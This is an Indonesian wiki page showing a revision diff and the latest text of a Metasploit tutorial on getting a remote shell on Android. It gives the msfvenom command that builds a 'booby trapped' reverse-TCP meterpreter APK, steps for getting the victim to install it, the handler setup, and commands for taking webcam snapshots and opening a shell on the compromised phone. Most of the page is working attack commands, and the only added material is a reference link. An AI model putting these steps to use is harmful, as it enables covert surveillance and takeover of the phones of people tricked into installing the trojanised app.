MSF: Dapatkan remote shell android: Difference between revisions
From OnnoCenterWiki
Jump to navigationJump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) No edit summary |
||
| (One intermediate revision by the same user not shown) | |||
| Line 5: | Line 5: | ||
Buat APK dengan kemampuan remote shell. Gunakan perintah msfpayload. Di Kali Linux, lakukan | Buat APK dengan kemampuan remote shell. Gunakan perintah msfpayload. Di Kali Linux, lakukan | ||
sudo | sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk | ||
Masukan IP address Kali Linux & Port-nya. | Masukan IP address Kali Linux & Port-nya. | ||
==Di sisi smartphone== | |||
* Copy / kirim file app.apk di Android device. | |||
* Install apk tersebut, akan ada warning ke user bahwa "apk tersebut dari unknown source". | |||
| Line 26: | Line 28: | ||
set lhost 192.168.1.16 (enter your Kali IP address) | set lhost 192.168.1.16 (enter your Kali IP address) | ||
set lport 4444 | set lport 4444 | ||
exploit1 | |||
==Attack== | |||
sysinfo - informasi tentang device | |||
ps - linux / android ps command | |||
webcam_list - list webcam yang ada | |||
webcam_snap - snapshot webcam | |||
shell - kalau membutuhkan shell (untuk device yang sudah di root) | |||
==Referensi== | ==Referensi== | ||
* http://www.infosecisland.com/blogview/23632-Getting-a-Remote-Shell-on-an-Android-Device-using-Metasploit.html | * http://www.infosecisland.com/blogview/23632-Getting-a-Remote-Shell-on-an-Android-Device-using-Metasploit.html | ||
Latest revision as of 22:54, 31 May 2017
Membuat booby trapped APK file
Buat APK dengan kemampuan remote shell. Gunakan perintah msfpayload. Di Kali Linux, lakukan
sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk
Masukan IP address Kali Linux & Port-nya.
Di sisi smartphone
- Copy / kirim file app.apk di Android device.
- Install apk tersebut, akan ada warning ke user bahwa "apk tersebut dari unknown source".
Di sisi Kali Linux
Di CLI, ketik
msfconsole
Jalankan perintah
user exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.1.16 (enter your Kali IP address) set lport 4444 exploit1
Attack
sysinfo - informasi tentang device ps - linux / android ps command webcam_list - list webcam yang ada webcam_snap - snapshot webcam shell - kalau membutuhkan shell (untuk device yang sudah di root)
